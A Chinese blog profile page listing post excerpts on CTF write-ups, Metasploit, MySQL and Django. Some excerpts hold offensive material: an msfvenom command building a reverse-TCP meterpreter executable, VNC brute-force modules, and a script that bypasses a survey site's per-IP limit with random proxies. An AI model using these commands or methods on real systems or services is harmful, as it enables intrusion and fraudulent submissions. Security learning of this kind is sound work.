- 博客(78)
- 资源 (5)
- 收藏
- 关注
RSS订阅转载 攻防世界fakebook
fakebook拿到题目,发现页面上有两个按钮,一个为join,另外一个为login,可能在注册登录界面存在注入漏洞,首先查看join。先扔到sqlmap里面跑一波,但长时间没启动了,sqlmap坏了,没办法,手动注入吧。先注册一个账号试试,用admin,看看admin是否能被注册,发现真的可以,但是似乎并没有什么卵用,不要忘了一个习惯,扫描。结果发现了如下几个文件:flag.phpflag.phpsrobots.txtview.phplogin.phpjoin.php访问一下注册
2021-07-23 00:35:27
548
1
原创 无线安全渗透1
理论部分802.11标准802委员会第十一组负责开发无线局域网标准日常使用的几个标准原本协议考虑用红外线波为传输介质,但是实际制作中红外线波存在各种问题,目前采用无线点波为传输介质。军方限制民用使用的频宽,来避免造成国家机密的泄露。一般来说,2.4G-2.485G之间为可民用无线频率。为了提高传输速度,就要扩频,扩频公式c=b+log2(1+s/n),无线射频信号编码分为DSSS(直序扩频)和FHSS(跳频扩频)。当有不同的信号同时占用频宽的时候,就会发生冲突,为了避免这种频宽占用发生的冲突
2020-10-02 22:18:27
255
原创 python requests库学习
写在前面安装requests库只需要pip一条命令,安装python编译环境是一定要勾选将pip安装到环境变量的选项。pip install requests查看requests库调用方法import requestsprint(dir(requests))添加代理r=requests.get(url,proxies=proxies)proxies是一个字典对象import requestsurl="https://www.baidu.com"proxies={ "h
2020-07-30 18:53:39
350
原创 msf Armitage图形化 前端
文章目录Armitage 简介1.启动ArmitageArmitage 简介1.启动Armitage启动数据库 service postgresql start
2020-07-28 23:56:30
508
原创 msf后渗透
主要内容首先构造一个payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe已经找到一台机器执行了我的payload进一步获取更高的权限。获取system权限load privgetsystems执行出现超时先返回msf,保留session
2020-07-19 21:57:45
3239
原创 msf弱点扫描
VNC远程桌面使用密码暴力破解模块use auxiliary/scanner/vnc/vnc_login标准的vnc开放的是5900端口自带密码文件,cat命令查看后只有一个password,有点儿敷衍,可以自己更换密码。破解出来,就可以使用vncconnect命令连接。无密码vnc基本不存在,看运气,能找到一个,几乎可以买彩票了。– use auxiliary/scanner/vnc/vnc_none_authRDP扫描测试查看是否存在远程桌面漏洞use auxiliary/s
2020-07-15 12:23:27
775
原创 MSF信息收集
扫描1.nmap扫描例如:db_nmap -sV 192.168.1.0/24 //参数sv为全面扫描2.Auxiliary 扫描模块 RHOSTS <> RHOST 192.168.1.20-192.168.1.30 //指定一个网段 192.168.1.0/24,192.168.11.0/24 //指定多个网段,用逗号隔开 file:/root/h.txt //将网段保存在文件内arp扫描use auxiliary/scanner/discove
2020-07-08 22:21:23
488
原创 MSF使用记录
msf架构:Rex:调用的是操作系统中函数库,各种协议的沟通,协议的连接。是MSF依赖的基础。MSF:core:最底层的库,MSF的核心库。MSF:base: 由于核心库调用复杂凌乱,整理之后的结构为如下的几个模块,便于调用。MSF:UI 用户界面。启动:kali虚拟机下直接点击图标就可以使用关于MSF数据库msfdbmsfdb init 初始化数据库msfdb reinit 删除目前的的然后进行初化msfdb delete 删除数据库,不在使用。netstat -pa
2020-06-29 22:11:56
530
原创 mysql 数据备份与还原
数据备份的三种方法1.使用mysqldump 语句mysqldump -u user -h host -p password dbname[tbame,[tbname...]]> filename例如:备份test数据库中的所有表mysqldump -u root -p test > C:/backup/test.sql备份test数据库中的account表mysql...
2020-04-15 12:03:51
194
原创 python类学习笔记
类的定义用class语句来创建一个类class student: pass #空语句,起到占位作用if __name__=='__main__': stu=student()#创建student对象,并将创建的对象赋给变量stu print(stu)#输出为这个对象所占的内存空间的首地址基于类创建对象,运行的结果如图关于对象类的属性1.创建student类包含name...
2020-04-10 21:42:58
671
1
原创 mysql触发器
触发器是一个特殊的存储过程,不同的是,存储过程要用call来调用,触发器在一个特定的事件发生的时候,mysql自动调用触发器。创建语法CREATE TRIGER trigger_name trigger_time trigger_event ON tb_name FOR EACH ROW trirgger_stmt其中,trigger_name 是触发器的名称;trigger 是触发的时机,...
2020-04-06 21:09:40
218
原创 Attempt to invoke virtual method 'void android.widget.LinearLayout.setBackgroundColor(int)'
在做android_studio的本息计算器的时候,出现了一个问题:Attempt to invoke virtual method 'void android.widget.LinearLayout.setBackgroundColor(int)'on a null object referenceatcom.example.myapplication.MainActivity.onOpti...
2020-04-02 22:21:19
3595
原创 mysql的存储过程和函数小结
创建存储过程基本语法如下:create procedure sp_name ( [proc_parameter]) [characteristics ... ] routine_body(1)create procedure 用来创建存储过程的关键字。(2)sp_name 为存储过程的名称(3) proc_parameter 为存储过程的参数列表,列表形式如下:[in |out |in...
2020-04-01 00:55:00
370
原创 mysql正则查询
mysql常用的字符匹配列表选项说明例子^匹配文本的开始字符^b:匹配以字母b开头的字符串$匹配文本的结束字符st$:匹配以st结尾的字符串.匹配任何单字字符b.t:匹配b与t之间任意一个字符*匹配零个或者多个在它前面的字符f*n :匹配n前面零个或者多个f字符的字符串+匹配前面的字符一次或者多次ba+:匹配以b 开头的后面紧跟一...
2020-03-30 22:22:58
365
原创 mysql用户管理
文章目录权限表1.user表2.db表和host表3.table_priv表和columns_priv表4.procs_priv表权限表1.user表是mysql最重要的权限表,记录了允许连接到服务器的账户信息,里面的权限为全局级别。字段可以分为四类。用户列:uesr,host,password,其中uesr和host为联合主键。权限列字段决定了用户的权限,描述了在全局范围内允许对数...
2020-03-09 15:53:22
313
原创 mysql函数小结
文章目录数学函数1.绝对值函数和圆周率函数2.平方根函数和求余函数3.取整函数4.随机数函数5.四舍五入函数6.符号函数7.幂运算函数8.对数函数9.角度与弧度相互转换函数10.三角函数数学函数1.绝对值函数和圆周率函数abs函数返回绝对值例如:mysql> select abs(-2),abs(2),abs(-3.3);+---------+--------+---------...
2020-02-27 16:56:43
371
原创 数据库插入,查询,删除
插入数据insert into table_name (column_list) values(value_list)插入一条记录insert into person (id,name,age,info) values(1,'Green',21,'Lawyer');列表名可以省略例如:insert into persion values(2,'Marry',24,'Musiacan'...
2020-02-26 18:18:39
484
原创 数据库视图小结
视图的含义和基本的使用含义:视图是一个虚拟表,是数据库从一个或者多个表中导出的表。视图还可以在已有的视图的基础上定义。说白了视图就是为了不让用户看到真实的表结构而用sql语句组成了虚表展现给用户,对构成视图的基本表修改会直接影响到视图,而对视图数据的修改也可以使真实的表数据发生改变。视图与表的比较1.视图是已经编好的sql语句,是基于sql语句结果集的可视化的表,而表不是2.视图没有实...
2020-02-25 18:28:01
1040
原创 数据库索引
索引是一个单独的,存储在磁盘上的数据库结构,包含对数据表里所有记录的引用指针。mysql的索引存储类型有两种,BTREE和HASH.索引是在存储引擎中实现的,每种存储引擎的索引不一定都相同。所有的存储引擎都支持每个表至少16个索引,索引长度至少为256个字节。索引的分类1.普通索引和唯一索引普通索引为基本索引类型,允许在定义的索引列中插入重复值和空值。唯一索引只索引值必须唯一,但允许空值...
2020-02-14 17:59:21
444
原创 mysql 中的运算符
比较运算符除了一般的的比较运算符,还包括IN,IS NULL,BETWEEN AND,GREATEST,LEAST,LIKE,REGEXP.逻辑运算符NOT ! 非AND && 与OR || 或XOR 异或位操作运算符& 与| 或~ 位非^ 位异或>> 右移<< 左移运算符在执行运算时,除法0不能作为除数,所以当除以0的...
2020-02-13 15:44:50
190
原创 Django 开发收银系统六
销售查询功能实现作为管理员,对销售的明细的查询是必要的。前端的界面如下:虽然saleList表中有数据,但是并没有写入到表格中,所以希纳是的界面销售前端页面没有数据,要完成的是将表中的数据列入表格。展示销售概况,在views.py 添加功能函数,在urls.py下添加路径 path('main/', shop_views.main, name='main'), path('m...
2020-02-08 17:36:11
362
原创 Django 开发收银系统五
管理主界面效果如下:这里面的每个功能现在都是静态的前端显示的界面,我们现在需要对它进行动态展示,对应数据库中的内容,回顾数据库中的内容。Create Table if Not EXISTS AdminModules( ModuleId int Auto_Increment COMMENT '模块编号', ModuleName VARCHAR(100) Not Null COMMENT...
2020-02-07 20:19:26
382
原创 Django 开发收银系统四
写在前面前三篇已经写到了收银的大致的功能都已经基本实现,但是缺少的是将数据提交到数据库中。本章目标先从最简单的取消订单开始,也就是将订单页面清空。清空的内容包含流水单号,购物车内的商品,商品总价金额置零等。首先完成前端的取消事件。<div class="form-group"> <input type="button" cl...
2020-02-06 20:29:02
391
原创 Django开发收银系统三
实现前台收银1.模块介绍本章流程实现的页面如下:生成流水单号并展示使用面向对象写法,在shop的文件夹下创建myclass文件夹,直接调用myclass里的函数,是代码简洁。在myclass里创建文件shop_cashier.py,设计的流水单号如下。生成时间戳,引入时间函数和随机数函数import pymysqlfrom supermarket.settings impo...
2020-01-18 22:05:30
604
原创 Django开发收银系统二
写在前面,Django的项目创建开发基础,请在mooc上看基础免费课程创建项目,连接数据库创建项目django-admin startproject Dj03010python manage.py startapp shop在setting.py的目录下,引入建好的appINSTALLED_APPS = [ 'django.contrib.admin', 'djang...
2020-01-17 21:56:40
638
原创 Django开发收银系统一
项目介绍Django 开发收银系统,跟着王进老师学习笔记,学习完成记录下,最终效果如下:收银页面截图如下:登陆界面:管理员界面:第一章开发从数据库开始数据库设计:需要设计的数据表职位表的表结构:打开数据库管理工具,创建数据库shooop,选择utf-8字符新建查询,名为data新建职位表positionCREATE TABLE if NOT EXISTS P...
2020-01-13 18:12:02
1643
5
原创 buuctf rsa刷题记录(记几种类型的RSA攻击二)
前言最近学习了点儿rsa这里总结以下我的buctf rsa部分刷题记录dp,dp泄露场景描述:假设题目仅给出p,q,dp,dq,c,即不给公钥e这种参数是为了让解密的时候更快速产生的dp=d%(p-1)dq=d%(q-1)例如:buuctf RSA1p = 863763376725700856709965348654109117132049150943361544753916...
2019-12-06 23:07:55
6379
2
原创 windows 常用命令
win+L 锁定用户到登录状态进入本地安全策略在调出cmd框的窗口中输入compmgmt.msc直接进入计算机管理输入secpol.msc进入本地安全策略添加用户cmd下输入net user 名称 密码 /add例如添加aa,密码为123的用户(需要在管理员身份下运行)可以在搜索框输入cmd,右击鼠标,选中以管理员身份运行net user aa 123 /add查看所有用户...
2019-11-14 21:38:24
318
1
原创 bugkuctf jwt
bugku jwt查看页面源码,发现了注释,<!–hint:NNVTU23LGEZDG===–>很像是base64,但是不是,解密结果为未知字符。又去注了半天,没有跑出密码,后来看了大佬的wp才发现是base32,无语,思维定型了,开始的时候想着试试base32,自己把自己否定了,我tcl了。注释内容base32解密后是kk:kkk123,猜测是账户和密码,登陆成功信息上要...
2019-11-13 00:19:49
1649
原创 ctf 内存取证的一些命令
内存取证相当于给出镜像文件,一般为.raw文件,在这些文件中找出相应的文件常用命令在kali下用工具volatility查看系统信息volatility -f mem.raw imageinfo如下显示的系统都有可能,可以一个个的试试查看运行程序列表volatility -f mem.raw --profile=Win7SP1x64 pslist...
2019-11-12 15:50:40
7612
原创 云服务器ubuntu18.0.4安装apache2
首先升级安装源 sudo apt update在root权限下安装: sudo apt install apache2安装完成后,您可以检查版本号,从而通过输入以下命令验证系统上是否确实安装了Apache2:apache2 -version输出如下:Server version: Apache/2.4.29 (Ubuntu)Server built: 2018-10-10T...
2019-11-11 23:11:58
541
原创 crypto 曼彻斯特编码
曼彻斯特编码:曼彻斯特编码将时钟和数据包含在数据流中,在传输代码信息的同时,也将时钟同步信号一起传输到对方,每位编码中有一跳变,不存在直流分量,因此具有自同步能力和良好的抗干扰性能。但每一个码元都被调成两个电平,所以数据传输速率只有调制速率的1/2。曼彻斯特编码表示0或1有两种不同的方法:第一种G. E. Thomas, Andrew S. Tanenbaum1949年提出的,它规定0是由低-...
2019-11-08 17:40:42
2682
1
原创 python 实现问卷星自动填写多份
问卷星的问卷填写工具:burpsuit,python问卷星亲测,可以用python的requests库对问卷访问填写。首先对访问的页面进行抓包,得到的header部分照抄到requests的header里。亲测一个ip只能填写三份问卷,所以这里再脚本上加入随机的代理头部脚本如下:import requestsfrom urllib import parsefrom time impo...
2019-11-04 16:52:18
5002
5
原创 记一道流量分析题目
用wireshark打开文件发现大量的ftp包,可以肯定在传输某些文件,随便点开一个长度大的,进行tcp流跟踪查到第二个流的时候,看到了传输的文件名,继续往后看找到了压缩包,将显示数据改为原始字节流,在hxd下打开,得到压缩包。key.txt时被加密的密文,继续寻找找到了公钥文件,直接拷贝出来。继续寻找,又找到了私钥,也直接拷贝出来下面就是解码了from Crypto....
2019-10-26 17:37:59
532
原创 永恒之蓝windows7 下的渗透测试
漏洞介绍永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大...
2019-10-14 23:54:39
1290
原创 SUctf checkIn
看了道上传的关于.user.ini的题目,这里试着做一下题目地址buuctf checkln打开题目,出现了简单的上传框试着上传php文件更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败.试试改为jpg发现它对<?内容进行了检验。我们可以构造这种形式的木马<script language="php"> @eval($_P...
2019-10-08 20:00:06
525
原创 ctf命令执行小结
1.相关函数eval函数eval函数能够将字符串当作命令去执行需要被执行的字符串代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
2019-10-04 00:29:05
4448
转载 cryptopals crypto challenges(set 1)
1.Convert hex to base64The string:49276d206b696c6c696e6720796f757220627261696e206c696b65206120706f69736f6e6f7573206d757368726f6f6dShould produce:SSdtIGtpbGxpbmcgeW91ciBicmFpbiBsaWtlIGEgcG9pc29ub3...
2019-09-29 16:33:01
249
原创 攻防世界crypto部分
Easy-one开始时发现encrpto.c给了密钥,但是用它解密msg002.enc是乱码,并不能得到。发现文件里的两个文件,msg001 和msg001.enc得到密钥。解密脚本如下:k= "Hi! This is only test message"t=0f=open("msg001.enc",'rb')a=f.read()#print(a)s=(len(k))ss=0k...
2019-09-26 20:23:40
966
MyApplication14.rar
2020-05-31
本息计算器.rar 增加了菜单,可以更换背景颜色
2020-04-02
Django 无人超市前端.zip
2020-02-08
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人